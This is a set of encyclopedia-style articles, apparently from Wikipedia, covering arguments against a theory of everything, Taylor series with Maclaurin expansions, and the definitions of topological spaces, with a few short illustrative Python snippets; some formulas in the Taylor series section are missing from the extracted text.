Causal dynamical triangulation does not assume any pre-existing arena (dimensional space), but rather attempts to show how the spacetime fabric itself evolves. Another attempt may be related to ER=EPR, a conjecture in physics stating that entangled particles are connected by a wormhole (or Einstein–Rosen bridge). Present status At present, there is no candidate theory of everything that includes the standard model of particle physics and general relativity and that, at the same time, is able to calculate the fine-structure constant or the mass of the electron. Most particle physicists expect that the outcome of ongoing experiments – the search for new particles at the large particle accelerators and for dark matter – are needed in order to provide further input for a theory of everything. Arguments against In parallel to the intense search for a theory of everything, various scholars have debated the possibility of its discovery. Gödel's incompleteness theorem A number of scholars claim that Gödel's incompleteness theorem suggests that attempts to construct a theory of everything are bound to fail. Gödel's theorem, informally stated, asserts that any formal theory sufficient to express elementary arithmetical facts and strong enough for them to be proved is either inconsistent (both a statement and its denial can be derived from its axioms) or incomplete, in the sense that there is a true statement that can't be derived in the formal theory. Stanley Jaki, in his 1966 book The Relevance of Physics, pointed out that, because a "theory of everything" will certainly be a consistent non-trivial mathematical theory, it must be incomplete. He claims that this dooms searches for a deterministic theory of everything. Freeman Dyson has stated that "Gödel's theorem implies that pure mathematics is inexhaustible. No matter how many problems we solve, there will always be other problems that cannot be solved within the existing rules. […] Because of Gödel's theorem, physics is inexhaustible too. The laws of physics are a finite set of rules, and include the rules for doing mathematics, so that Gödel's theorem applies to them." Stephen Hawking was originally a believer in the Theory of Everything, but after considering Gödel's Theorem, he concluded that one was not obtainable. "Some people will be very disappointed if there is not an ultimate theory that can be formulated as a finite number of principles. I used to belong to that camp, but I have changed my mind." Jürgen Schmidhuber (1997) has argued against this view; he asserts that Gödel's theorems are irrelevant for computable physics. In 2000, Schmidhuber explicitly constructed limit-computable, deterministic universes whose pseudo-randomness based on undecidable, Gödel-like halting problems is extremely hard to detect but does not prevent formal theories of everything describable by very few bits of information. Related critique was offered by Solomon Feferman and others. Douglas S. Robertson offers Conway's game of life as an example: The underlying rules are simple and complete, but there are formally undecidable questions about the game's behaviors. Analogously, it may (or may not) be possible to completely state the underlying rules of physics with a finite number of well-defined laws, but there is little doubt that there are questions about the behavior of physical systems which are formally undecidable on the basis of those underlying laws. 
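Robertson's Game of Life example can be made concrete: the complete transition rule of this toy universe fits in a few lines of code, yet questions about its long-run behavior (for instance, whether a given pattern ever dies out) are formally undecidable. A minimal sketch, with the function name ours for illustration:

```python
from collections import Counter

def life_step(live: set[tuple[int, int]]) -> set[tuple[int, int]]:
    """Advance Conway's Game of Life one generation on an unbounded grid.

    `live` holds the coordinates of live cells; these few lines are the
    complete "laws of physics" of the toy universe.
    """
    # Count how many live neighbours every relevant cell has.
    counts = Counter(
        (x + dx, y + dy)
        for (x, y) in live
        for dx in (-1, 0, 1)
        for dy in (-1, 0, 1)
        if (dx, dy) != (0, 0)
    )
    # A cell is alive next step with exactly 3 live neighbours,
    # or with 2 live neighbours if it is already alive.
    return {cell for cell, n in counts.items() if n == 3 or (n == 2 and cell in live)}

# A "blinker" oscillates with period 2 under these simple, fully stated rules.
blinker = {(0, 0), (1, 0), (2, 0)}
print(life_step(life_step(blinker)) == blinker)  # True
```

The rules above are complete and deterministic, yet no algorithm can decide, for every starting configuration, what its ultimate fate will be.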
Since most physicists would consider the statement of the underlying rules to suffice as the definition of a "theory of everything", most physicists argue that Gödel's Theorem does not mean that a theory of everything cannot exist. On the other hand, the scholars invoking Gödel's Theorem appear, at least in some cases, to be referring not to the underlying rules, but to the understandability of the behavior of all physical systems, as when Hawking mentions arranging blocks into rectangles, turning the computation of prime numbers into a physical question. This definitional discrepancy may explain some of the disagreement among researchers. Fundamental limits in accuracy No physical theory to date is believed to be precisely accurate. Instead, physics has proceeded by a series of "successive approximations" allowing more and more accurate predictions over a wider and wider range of phenomena. Some physicists believe that it is therefore a mistake to confuse theoretical models with the true nature of reality, and hold that the series of approximations will never terminate in the "truth". Einstein himself expressed this view on occasion. Definition of fundamental laws There is a philosophical debate within the physics community as to whether a theory of everything deserves to be called the fundamental law of the universe. One view is the hard reductionist position that the theory of everything is the fundamental law and that all other theories that apply within the universe are a consequence of the theory of everything. Another view is that emergent laws, which govern the behavior of complex systems, should be seen as equally fundamental. Examples of emergent laws are the second law of thermodynamics and the theory of natural selection. The advocates of emergence argue that emergent laws, especially those describing complex or living systems, are independent of the low-level, microscopic laws. In this view, emergent laws are as fundamental as a theory of everything. The debates do not make the point at issue clear. Possibly the only issue at stake is the right to apply the high-status term "fundamental" to the respective subjects of research. A well-known debate over this took place between Steven Weinberg and Philip Anderson. Impossibility of calculation Weinberg points out that calculating the precise motion of an actual projectile in the Earth's atmosphere is impossible. So how can we know we have an adequate theory for describing the motion of projectiles? Weinberg suggests that we know principles (Newton's laws of motion and gravitation) that work "well enough" for simple examples, like the motion of planets in empty space. These principles have worked so well on simple examples that we can be reasonably confident they will work for more complex examples. For example, although general relativity includes equations that do not have exact solutions, it is widely accepted as a valid theory because all of its equations with exact solutions have been experimentally verified. Likewise, a theory of everything must work for a wide range of simple examples in such a way that we can be reasonably confident it will work for every situation in physics. Difficulties in creating a theory of everything often begin to appear when combining quantum mechanics with the theory of general relativity, as the equations of quantum mechanics begin to falter when the force of gravity is applied to them.
Physical sciences
Particle physics: General
Physics
30448
https://en.wikipedia.org/wiki/Taylor%20series
Taylor series
In mathematics, the Taylor series or Taylor expansion of a function is an infinite sum of terms that are expressed in terms of the function's derivatives at a single point. For most common functions, the function and the sum of its Taylor series are equal near this point. Taylor series are named after Brook Taylor, who introduced them in 1715. A Taylor series is also called a Maclaurin series when 0 is the point where the derivatives are considered, after Colin Maclaurin, who made extensive use of this special case of Taylor series in the 18th century. The partial sum formed by the first $n + 1$ terms of a Taylor series is a polynomial of degree $n$ that is called the $n$th Taylor polynomial of the function. Taylor polynomials are approximations of a function, which become generally more accurate as $n$ increases. Taylor's theorem gives quantitative estimates on the error introduced by the use of such approximations. If the Taylor series of a function is convergent, its sum is the limit of the infinite sequence of the Taylor polynomials. A function may differ from the sum of its Taylor series, even if its Taylor series is convergent. A function is analytic at a point $x = a$ if it is equal to the sum of its Taylor series in some open interval (or open disk in the complex plane) containing $a$. This implies that the function is analytic at every point of the interval (or disk). Definition The Taylor series of a real or complex-valued function $f(x)$, that is infinitely differentiable at a real or complex number $a$, is the power series
$$f(a) + \frac{f'(a)}{1!}(x-a) + \frac{f''(a)}{2!}(x-a)^2 + \frac{f'''(a)}{3!}(x-a)^3 + \cdots$$
Here, $n!$ denotes the factorial of $n$. The function $f^{(n)}(a)$ denotes the $n$th derivative of $f$ evaluated at the point $a$. The derivative of order zero of $f$ is defined to be $f$ itself, and $(x-a)^0$ and $0!$ are both defined to be 1. This series can also be written by using sigma notation:
$$\sum_{n=0}^{\infty} \frac{f^{(n)}(a)}{n!}\,(x-a)^n.$$
With $a = 0$, the Maclaurin series takes the form:
$$f(0) + \frac{f'(0)}{1!}x + \frac{f''(0)}{2!}x^2 + \cdots = \sum_{n=0}^{\infty} \frac{f^{(n)}(0)}{n!}\,x^n.$$
Examples The Taylor series of any polynomial is the polynomial itself. The Maclaurin series of $\frac{1}{1-x}$ is the geometric series
$$1 + x + x^2 + x^3 + \cdots.$$
So, by substituting $1 - x$ for $x$, the Taylor series of $\frac{1}{x}$ at $a = 1$ is
$$1 - (x-1) + (x-1)^2 - (x-1)^3 + \cdots.$$
By integrating the above Maclaurin series, we find the Maclaurin series of $\ln(1-x)$, where $\ln$ denotes the natural logarithm:
$$-x - \frac{x^2}{2} - \frac{x^3}{3} - \frac{x^4}{4} - \cdots.$$
The corresponding Taylor series of $\ln x$ at $a = 1$ is
$$(x-1) - \frac{(x-1)^2}{2} + \frac{(x-1)^3}{3} - \cdots,$$
and more generally, the corresponding Taylor series of $\ln x$ at an arbitrary nonzero point $a$ is:
$$\ln a + \frac{x-a}{a} - \frac{(x-a)^2}{2a^2} + \frac{(x-a)^3}{3a^3} - \cdots.$$
The Maclaurin series of the exponential function $e^x$ is
$$\sum_{n=0}^{\infty} \frac{x^n}{n!} = 1 + x + \frac{x^2}{2!} + \frac{x^3}{3!} + \cdots.$$
The above expansion holds because the derivative of $e^x$ with respect to $x$ is also $e^x$, and $e^0$ equals 1. This leaves the terms $(x-0)^n$ in the numerator and $n!$ in the denominator of each term in the infinite sum. History The ancient Greek philosopher Zeno of Elea considered the problem of summing an infinite series to achieve a finite result, but rejected it as an impossibility; the result was Zeno's paradox. Later, Aristotle proposed a philosophical resolution of the paradox, but the mathematical content was apparently unresolved until taken up by Archimedes, as it had been prior to Aristotle by the Presocratic Atomist Democritus. It was through Archimedes's method of exhaustion that an infinite number of progressive subdivisions could be performed to achieve a finite result. Liu Hui independently employed a similar method a few centuries later. In the 14th century, the earliest examples of specific Taylor series (but not the general method) were given by Indian mathematician Madhava of Sangamagrama. Though no record of his work survives, writings of his followers in the Kerala school of astronomy and mathematics suggest that he found the Taylor series for the trigonometric functions of sine, cosine, and arctangent (see Madhava series).
During the following two centuries his followers developed further series expansions and rational approximations. In late 1670, James Gregory was shown in a letter from John Collins several Maclaurin series and derived by Isaac Newton, and told that Newton had developed a general method for expanding functions in series. Newton had in fact used a cumbersome method involving long division of series and term-by-term integration, but Gregory did not know it and set out to discover a general method for himself. In early 1671 Gregory discovered something like the general Maclaurin series and sent a letter to Collins including series for (the integral of (the integral of , the inverse Gudermannian function), and (the Gudermannian function). However, thinking that he had merely redeveloped a method by Newton, Gregory never described how he obtained these series, and it can only be inferred that he understood the general method by examining scratch work he had scribbled on the back of another letter from 1671. In 1691–1692, Isaac Newton wrote down an explicit statement of the Taylor and Maclaurin series in an unpublished version of his work De Quadratura Curvarum. However, this work was never completed and the relevant sections were omitted from the portions published in 1704 under the title Tractatus de Quadratura Curvarum. It was not until 1715 that a general method for constructing these series for all functions for which they exist was finally published by Brook Taylor, after whom the series are now named. The Maclaurin series was named after Colin Maclaurin, a Scottish mathematician, who published a special case of the Taylor result in the mid-18th century. Analytic functions If is given by a convergent power series in an open disk centred at in the complex plane (or an interval in the real line), it is said to be analytic in this region. Thus for in this region, is given by a convergent power series Differentiating by the above formula times, then setting gives: and so the power series expansion agrees with the Taylor series. Thus a function is analytic in an open disk centered at if and only if its Taylor series converges to the value of the function at each point of the disk. If is equal to the sum of its Taylor series for all in the complex plane, it is called entire. The polynomials, exponential function , and the trigonometric functions sine and cosine, are examples of entire functions. Examples of functions that are not entire include the square root, the logarithm, the trigonometric function tangent, and its inverse, arctan. For these functions the Taylor series do not converge if is far from . That is, the Taylor series diverges at if the distance between and is larger than the radius of convergence. The Taylor series can be used to calculate the value of an entire function at every point, if the value of the function, and of all of its derivatives, are known at a single point. Uses of the Taylor series for analytic functions include: The partial sums (the Taylor polynomials) of the series can be used as approximations of the function. These approximations are good if sufficiently many terms are included. Differentiation and integration of power series can be performed term by term and is hence particularly easy. An analytic function is uniquely extended to a holomorphic function on an open disk in the complex plane. This makes the machinery of complex analysis available. 
The (truncated) series can be used to compute function values numerically, (often by recasting the polynomial into the Chebyshev form and evaluating it with the Clenshaw algorithm). Algebraic operations can be done readily on the power series representation; for instance, Euler's formula follows from Taylor series expansions for trigonometric and exponential functions. This result is of fundamental importance in such fields as harmonic analysis. Approximations using the first few terms of a Taylor series can make otherwise unsolvable problems possible for a restricted domain; this approach is often used in physics. Approximation error and convergence Pictured is an accurate approximation of around the point . The pink curve is a polynomial of degree seven: The error in this approximation is no more than . For a full cycle centered at the origin () the error is less than 0.08215. In particular, for , the error is less than 0.000003. In contrast, also shown is a picture of the natural logarithm function and some of its Taylor polynomials around . These approximations converge to the function only in the region ; outside of this region the higher-degree Taylor polynomials are worse approximations for the function. The error incurred in approximating a function by its th-degree Taylor polynomial is called the remainder or residual and is denoted by the function . Taylor's theorem can be used to obtain a bound on the size of the remainder. In general, Taylor series need not be convergent at all. In fact, the set of functions with a convergent Taylor series is a meager set in the Fréchet space of smooth functions. Even if the Taylor series of a function does converge, its limit need not be equal to the value of the function . For example, the function is infinitely differentiable at , and has all derivatives zero there. Consequently, the Taylor series of about is identically zero. However, is not the zero function, so does not equal its Taylor series around the origin. Thus, is an example of a non-analytic smooth function. In real analysis, this example shows that there are infinitely differentiable functions whose Taylor series are not equal to even if they converge. By contrast, the holomorphic functions studied in complex analysis always possess a convergent Taylor series, and even the Taylor series of meromorphic functions, which might have singularities, never converge to a value different from the function itself. The complex function , however, does not approach 0 when approaches 0 along the imaginary axis, so it is not continuous in the complex plane and its Taylor series is undefined at 0. More generally, every sequence of real or complex numbers can appear as coefficients in the Taylor series of an infinitely differentiable function defined on the real line, a consequence of Borel's lemma. As a result, the radius of convergence of a Taylor series can be zero. There are even infinitely differentiable functions defined on the real line whose Taylor series have a radius of convergence 0 everywhere. A function cannot be written as a Taylor series centred at a singularity; in these cases, one can often still achieve a series expansion if one allows also negative powers of the variable ; see Laurent series. For example, can be written as a Laurent series. Generalization The generalization of the Taylor series does converge to the value of the function itself for any bounded continuous function on , and this can be done by using the calculus of finite differences. 
Specifically, the following theorem, due to Einar Hille, that for any , Here is the th finite difference operator with step size . The series is precisely the Taylor series, except that divided differences appear in place of differentiation: the series is formally similar to the Newton series. When the function is analytic at , the terms in the series converge to the terms of the Taylor series, and in this sense generalizes the usual Taylor series. In general, for any infinite sequence , the following power series identity holds: So in particular, The series on the right is the expected value of , where is a Poisson-distributed random variable that takes the value with probability . Hence, The law of large numbers implies that the identity holds. List of Maclaurin series of some common functions Several important Maclaurin series expansions follow. All these expansions are valid for complex arguments . Exponential function The exponential function (with base ) has Maclaurin series It converges for all . The exponential generating function of the Bell numbers is the exponential function of the predecessor of the exponential function: Natural logarithm The natural logarithm (with base ) has Maclaurin series The last series is known as Mercator series, named after Nicholas Mercator (since it was published in his 1668 treatise Logarithmotechnia). Both of these series converge for . (In addition, the series for converges for , and the series for converges for .) Geometric series The geometric series and its derivatives have Maclaurin series All are convergent for . These are special cases of the binomial series given in the next section. Binomial series The binomial series is the power series whose coefficients are the generalized binomial coefficients (If , this product is an empty product and has value 1.) It converges for for any real or complex number . When , this is essentially the infinite geometric series mentioned in the previous section. The special cases and give the square root function and its inverse: When only the linear term is retained, this simplifies to the binomial approximation. Trigonometric functions The usual trigonometric functions and their inverses have the following Maclaurin series: All angles are expressed in radians. The numbers appearing in the expansions of are the Bernoulli numbers. The in the expansion of are Euler numbers. Hyperbolic functions The hyperbolic functions have Maclaurin series closely related to the series for the corresponding trigonometric functions: The numbers appearing in the series for are the Bernoulli numbers. Polylogarithmic functions The polylogarithms have these defining identities: The Legendre chi functions are defined as follows: And the formulas presented below are called inverse tangent integrals: In statistical thermodynamics these formulas are of great importance. Elliptic functions The complete elliptic integrals of first kind K and of second kind E can be defined as follows: The Jacobi theta functions describe the world of the elliptic modular functions and they have these Taylor series: The regular partition number sequence P(n) has this generating function: The strict partition number sequence Q(n) has that generating function: Calculation of Taylor series Several methods exist for the calculation of Taylor series of a large number of functions. One can attempt to use the definition of the Taylor series, though this often requires generalizing the form of the coefficients according to a readily apparent pattern. 
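To make the definition-based approach concrete, here is a minimal Python sketch (the function name is ours, for illustration) that evaluates the $n$th Taylor polynomial of the exponential function at 0, whose derivatives at 0 are all equal to 1:

```python
import math

def maclaurin_exp(x: float, n: int) -> float:
    """n-th Taylor polynomial of exp at 0: the sum of x**k / k! for k = 0..n."""
    return sum(x ** k / math.factorial(k) for k in range(n + 1))

# The partial sums converge quickly to e = exp(1) as the degree grows.
for degree in (2, 5, 10):
    approx = maclaurin_exp(1.0, degree)
    print(degree, approx, abs(approx - math.e))
```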
Alternatively, one can use manipulations such as substitution, multiplication or division, addition or subtraction of standard Taylor series to construct the Taylor series of a function, by virtue of Taylor series being power series. In some cases, one can also derive the Taylor series by repeatedly applying integration by parts. Particularly convenient is the use of computer algebra systems to calculate Taylor series. First example In order to compute the 7th degree Maclaurin polynomial for the function one may first rewrite the function as the composition of two functions and The Taylor series for the natural logarithm is (using big O notation) and for the cosine function The first several terms from the second series can be substituted into each term of the first series. Because the first term in the second series has degree 2, three terms of the first series suffice to give a 7th-degree polynomial: Since the cosine is an even function, the coefficients for all the odd powers are zero. Second example Suppose we want the Taylor series at 0 of the function The Taylor series for the exponential function is and the series for cosine is Assume the series for their quotient is Multiplying both sides by the denominator and then expanding it as a series yields Comparing the coefficients of with the coefficients of The coefficients of the series for can thus be computed one at a time, amounting to long division of the series for and Third example Here we employ a method called "indirect expansion" to expand the given function. This method uses the known Taylor expansion of the exponential function. In order to expand as a Taylor series in , we use the known Taylor series of function : Thus, Taylor series as definitions Classically, algebraic functions are defined by an algebraic equation, and transcendental functions (including those discussed above) are defined by some property that holds for them, such as a differential equation. For example, the exponential function is the function which is equal to its own derivative everywhere, and assumes the value 1 at the origin. However, one may equally well define an analytic function by its Taylor series. Taylor series are used to define functions and "operators" in diverse areas of mathematics. In particular, this is true in areas where the classical definitions of functions break down. For example, using Taylor series, one may extend analytic functions to sets of matrices and operators, such as the matrix exponential or matrix logarithm. In other areas, such as formal analysis, it is more convenient to work directly with the power series themselves. Thus one may define a solution of a differential equation as a power series which, one hopes to prove, is the Taylor series of the desired solution. Taylor series in several variables The Taylor series may also be generalized to functions of more than one variable with For example, for a function that depends on two variables, and , the Taylor series to second order about the point is where the subscripts denote the respective partial derivatives. Second-order Taylor series in several variables A second-order Taylor series expansion of a scalar-valued function of more than one variable can be written compactly as where is the gradient of evaluated at and is the Hessian matrix. 
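In standard notation, the compact second-order form just referred to reads
$$f(\mathbf{x}) \approx f(\mathbf{a}) + \nabla f(\mathbf{a})^{\mathsf{T}}\,(\mathbf{x} - \mathbf{a}) + \frac{1}{2}\,(\mathbf{x} - \mathbf{a})^{\mathsf{T}}\,H(\mathbf{a})\,(\mathbf{x} - \mathbf{a}),$$
where $\nabla f(\mathbf{a})$ is the gradient of $f$ evaluated at $\mathbf{x} = \mathbf{a}$ and $H(\mathbf{a})$ is the Hessian matrix of $f$ at that point.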
Applying the multi-index notation the Taylor series for several variables becomes which is to be understood as a still more abbreviated multi-index version of the first equation of this paragraph, with a full analogy to the single variable case. Example In order to compute a second-order Taylor series expansion around point of the function one first computes all the necessary partial derivatives: Evaluating these derivatives at the origin gives the Taylor coefficients Substituting these values in to the general formula produces Since is analytic in , we have Comparison with Fourier series The trigonometric Fourier series enables one to express a periodic function (or a function defined on a closed interval ) as an infinite sum of trigonometric functions (sines and cosines). In this sense, the Fourier series is analogous to Taylor series, since the latter allows one to express a function as an infinite sum of powers. Nevertheless, the two series differ from each other in several relevant issues: The finite truncations of the Taylor series of about the point are all exactly equal to at . In contrast, the Fourier series is computed by integrating over an entire interval, so there is generally no such point where all the finite truncations of the series are exact. The computation of Taylor series requires the knowledge of the function on an arbitrary small neighbourhood of a point, whereas the computation of the Fourier series requires knowing the function on its whole domain interval. In a certain sense one could say that the Taylor series is "local" and the Fourier series is "global". The Taylor series is defined for a function which has infinitely many derivatives at a single point, whereas the Fourier series is defined for any integrable function. In particular, the function could be nowhere differentiable. (For example, could be a Weierstrass function.) The convergence of both series has very different properties. Even if the Taylor series has positive convergence radius, the resulting series may not coincide with the function; but if the function is analytic then the series converges pointwise to the function, and uniformly on every compact subset of the convergence interval. Concerning the Fourier series, if the function is square-integrable then the series converges in quadratic mean, but additional requirements are needed to ensure the pointwise or uniform convergence (for instance, if the function is periodic and of class C1 then the convergence is uniform). Finally, in practice one wants to approximate the function with a finite number of terms, say with a Taylor polynomial or a partial sum of the trigonometric series, respectively. In the case of the Taylor series the error is very small in a neighbourhood of the point where it is computed, while it may be very large at a distant point. In the case of the Fourier series the error is distributed along the domain of the function.
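The local-versus-global contrast drawn in this comparison is easy to observe numerically. A small Python sketch using the degree-7 Maclaurin polynomial of the sine function mentioned earlier:

```python
import math

def sin_taylor7(x: float) -> float:
    """Degree-7 Maclaurin polynomial of sin: x - x**3/3! + x**5/5! - x**7/7!."""
    return x - x**3 / 6 + x**5 / 120 - x**7 / 5040

# The error is tiny near the expansion point 0 and grows rapidly far from it.
for x in (0.1, 1.0, 3.0):
    print(x, abs(sin_taylor7(x) - math.sin(x)))
```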
Mathematics
Calculus and analysis
null
30450
https://en.wikipedia.org/wiki/Topological%20space
Topological space
In mathematics, a topological space is, roughly speaking, a geometrical space in which closeness is defined but cannot necessarily be measured by a numeric distance. More specifically, a topological space is a set whose elements are called points, along with an additional structure called a topology, which can be defined as a set of neighbourhoods for each point that satisfy some axioms formalizing the concept of closeness. There are several equivalent definitions of a topology, the most commonly used of which is the definition through open sets, which is easier than the others to manipulate. A topological space is the most general type of a mathematical space that allows for the definition of limits, continuity, and connectedness. Common types of topological spaces include Euclidean spaces, metric spaces and manifolds. Although very general, the concept of topological spaces is fundamental, and used in virtually every branch of modern mathematics. The study of topological spaces in their own right is called point-set topology or general topology. History Around 1735, Leonhard Euler discovered the formula $V - E + F = 2$ relating the number of vertices (V), edges (E) and faces (F) of a convex polyhedron, and hence of a planar graph. The study and generalization of this formula, specifically by Cauchy (1789–1857) and L'Huilier (1750–1840), boosted the study of topology. In 1827, Carl Friedrich Gauss published General investigations of curved surfaces, which in section 3 defines the curved surface in a similar manner to the modern topological understanding: "A curved surface is said to possess continuous curvature at one of its points A, if the direction of all the straight lines drawn from A to points of the surface at an infinitesimal distance from A are deflected infinitesimally from one and the same plane passing through A." Yet, "until Riemann's work in the early 1850s, surfaces were always dealt with from a local point of view (as parametric surfaces) and topological issues were never considered". "Möbius and Jordan seem to be the first to realize that the main problem about the topology of (compact) surfaces is to find invariants (preferably numerical) to decide the equivalence of surfaces, that is, to decide whether two surfaces are homeomorphic or not." The subject is clearly defined by Felix Klein in his "Erlangen Program" (1872): the geometry invariants of arbitrary continuous transformation, a kind of geometry. The term "topology" was introduced by Johann Benedict Listing in 1847, although he had used the term in correspondence some years earlier instead of previously used "Analysis situs". The foundation of this science, for a space of any dimension, was created by Henri Poincaré. His first article on this topic appeared in 1894. In the 1930s, James Waddell Alexander II and Hassler Whitney first expressed the idea that a surface is a topological space that is locally like a Euclidean plane. Topological spaces were first defined by Felix Hausdorff in 1914 in his seminal "Principles of Set Theory". Metric spaces had been defined earlier in 1906 by Maurice Fréchet, though it was Hausdorff who popularised the term "metric space". Definitions The utility of the concept of a topology is shown by the fact that there are several equivalent definitions of this mathematical structure. Thus one chooses the axiomatization suited for the application. The most commonly used is that in terms of open sets, but perhaps more intuitive is that in terms of neighbourhoods, and so this is given first.
Definition via neighbourhoods This axiomatization is due to Felix Hausdorff. Let $X$ be a (possibly empty) set. The elements of $X$ are usually called points, though they can be any mathematical object. Let $\mathcal{N}$ be a function assigning to each $x$ (point) in $X$ a non-empty collection $\mathcal{N}(x)$ of subsets of $X$. The elements of $\mathcal{N}(x)$ will be called neighbourhoods of $x$ with respect to $\mathcal{N}$ (or, simply, neighbourhoods of $x$). The function $\mathcal{N}$ is called a neighbourhood topology if the axioms below are satisfied; and then $X$ with $\mathcal{N}$ is called a topological space. If $N$ is a neighbourhood of $x$ (i.e., $N \in \mathcal{N}(x)$), then $x \in N$. In other words, each point of the set belongs to every one of its neighbourhoods with respect to $\mathcal{N}$. If $N$ is a subset of $X$ and includes a neighbourhood of $x$, then $N$ is a neighbourhood of $x$. I.e., every superset of a neighbourhood of a point is again a neighbourhood of that point. The intersection of two neighbourhoods of $x$ is a neighbourhood of $x$. Any neighbourhood $N$ of $x$ includes a neighbourhood $M$ of $x$ such that $N$ is a neighbourhood of each point of $M$. The first three axioms for neighbourhoods have a clear meaning. The fourth axiom has a very important use in the structure of the theory, that of linking together the neighbourhoods of different points of $X$. A standard example of such a system of neighbourhoods is for the real line $\mathbb{R}$, where a subset $N$ of $\mathbb{R}$ is defined to be a neighbourhood of a real number $x$ if it includes an open interval containing $x$. Given such a structure, a subset $U$ of $X$ is defined to be open if $U$ is a neighbourhood of all points in $U$. The open sets then satisfy the axioms given below in the next definition of a topological space. Conversely, when given the open sets of a topological space, the neighbourhoods satisfying the above axioms can be recovered by defining $N$ to be a neighbourhood of $x$ if $N$ includes an open set $U$ such that $x \in U$. Definition via open sets A topology on a set $X$ may be defined as a collection $\tau$ of subsets of $X$, called open sets and satisfying the following axioms: The empty set and $X$ itself belong to $\tau$. Any arbitrary (finite or infinite) union of members of $\tau$ belongs to $\tau$. The intersection of any finite number of members of $\tau$ belongs to $\tau$. As this definition of a topology is the most commonly used, the set $\tau$ of the open sets is commonly called a topology on $X$. A subset of $X$ is said to be closed in $(X, \tau)$ if its complement is an open set. Examples of topologies Given $X = \{1, 2, 3, 4\}$, the trivial or indiscrete topology on $X$ is the family $\{\emptyset, X\}$ consisting of only the two subsets of $X$ required by the axioms. Given $X = \{1, 2, 3, 4\}$, the family $\{\emptyset, \{2\}, \{1, 2\}, \{2, 3\}, \{1, 2, 3\}, \{1, 2, 3, 4\}\}$ of six subsets of $X$ forms another topology of $X$. Given $X = \{1, 2, 3, 4\}$, the discrete topology on $X$ is the power set of $X$, which is the family consisting of all possible subsets of $X$. In this case the topological space is called a discrete space. Given $X = \mathbb{Z}$, the set of integers, the family $\tau$ of all finite subsets of the integers plus $\mathbb{Z}$ itself is not a topology, because (for example) the union of all finite sets not containing zero is not finite and therefore not a member of the family of finite sets. The union of all finite sets not containing zero is also not all of $\mathbb{Z}$, and so it cannot be in $\tau$. Definition via closed sets Using de Morgan's laws, the above axioms defining open sets become axioms defining closed sets: The empty set and $X$ are closed. The intersection of any collection of closed sets is also closed. The union of any finite number of closed sets is also closed. Using these axioms, another way to define a topological space is as a set $X$ together with a collection $\tau$ of closed subsets of $X$. Thus the sets in the topology $\tau$ are the closed sets, and their complements in $X$ are the open sets.
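For finite examples like those above, the open-set axioms can be verified mechanically. A minimal Python sketch (names ours), checked against the six-member topology on {1, 2, 3, 4} given above:

```python
def is_topology(X: frozenset, opens: set) -> bool:
    """Check the open-set axioms for a finite candidate topology `opens` on X."""
    if frozenset() not in opens or X not in opens:
        return False
    # For a finite collection, closure under pairwise unions and
    # intersections implies closure under arbitrary (finite) ones.
    for a in opens:
        for b in opens:
            if a | b not in opens or a & b not in opens:
                return False
    return True

X = frozenset({1, 2, 3, 4})
opens = {frozenset(s) for s in [(), (2,), (1, 2), (2, 3), (1, 2, 3), (1, 2, 3, 4)]}
print(is_topology(X, opens))  # True: this family really is a topology on X
```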
Other definitions There are many other equivalent ways to define a topological space: in other words the concepts of neighbourhood, or that of open or closed sets can be reconstructed from other starting points and satisfy the correct axioms. Another way to define a topological space is by using the Kuratowski closure axioms, which define the closed sets as the fixed points of an operator on the power set of $X$. A net is a generalisation of the concept of sequence. A topology is completely determined if for every net in $X$ the set of its accumulation points is specified. Comparison of topologies Many topologies can be defined on a set to form a topological space. When every open set of a topology $\tau_1$ is also open for a topology $\tau_2$, one says that $\tau_2$ is finer than $\tau_1$, and $\tau_1$ is coarser than $\tau_2$. A proof that relies only on the existence of certain open sets will also hold for any finer topology, and similarly a proof that relies only on certain sets not being open applies to any coarser topology. The terms larger and smaller are sometimes used in place of finer and coarser, respectively. The terms stronger and weaker are also used in the literature, but with little agreement on the meaning, so one should always be sure of an author's convention when reading. The collection of all topologies on a given fixed set $X$ forms a complete lattice: if $F$ is a collection of topologies on $X$, then the meet of $F$ is the intersection of $F$, and the join of $F$ is the meet of the collection of all topologies on $X$ that contain every member of $F$. Continuous functions A function $f \colon X \to Y$ between topological spaces is called continuous if for every $x \in X$ and every neighbourhood $N$ of $f(x)$ there is a neighbourhood $M$ of $x$ such that $f(M) \subseteq N$. This relates easily to the usual definition in analysis. Equivalently, $f$ is continuous if the inverse image of every open set is open. This is an attempt to capture the intuition that there are no "jumps" or "separations" in the function. A homeomorphism is a bijection that is continuous and whose inverse is also continuous. Two spaces are called homeomorphic if there exists a homeomorphism between them. From the standpoint of topology, homeomorphic spaces are essentially identical. In category theory, one of the fundamental categories is Top, which denotes the category of topological spaces whose objects are topological spaces and whose morphisms are continuous functions. The attempt to classify the objects of this category (up to homeomorphism) by invariants has motivated areas of research, such as homotopy theory, homology theory, and K-theory. Examples of topological spaces A given set may have many different topologies. If a set is given a different topology, it is viewed as a different topological space. Any set can be given the discrete topology in which every subset is open. The only convergent sequences or nets in this topology are those that are eventually constant. Also, any set can be given the trivial topology (also called the indiscrete topology), in which only the empty set and the whole space are open. Every sequence and net in this topology converges to every point of the space. This example shows that in general topological spaces, limits of sequences need not be unique. However, often topological spaces must be Hausdorff spaces where limit points are unique. There exist numerous topologies on any given finite set. Such spaces are called finite topological spaces. Finite spaces are sometimes used to provide examples or counterexamples to conjectures about topological spaces in general.
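Finite spaces also make the open-set characterization of continuity easy to test directly: a map is continuous exactly when the preimage of every open set is open. A small Python sketch (names ours), continuing the conventions of the checker above:

```python
def preimage(f: dict, s: frozenset) -> frozenset:
    """Set of points of the domain that f sends into s."""
    return frozenset(x for x in f if f[x] in s)

def is_continuous(f: dict, opens_X: set, opens_Y: set) -> bool:
    """f maps points of X to points of Y; check preimages of open sets are open."""
    return all(preimage(f, v) in opens_X for v in opens_Y)

# X = {1, 2} with the discrete topology, Y = {'a', 'b'} with the trivial one.
opens_X = {frozenset(), frozenset({1}), frozenset({2}), frozenset({1, 2})}
opens_Y = {frozenset(), frozenset({'a', 'b'})}
f = {1: 'a', 2: 'b'}
print(is_continuous(f, opens_X, opens_Y))  # True: any map into a trivial space is continuous
```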
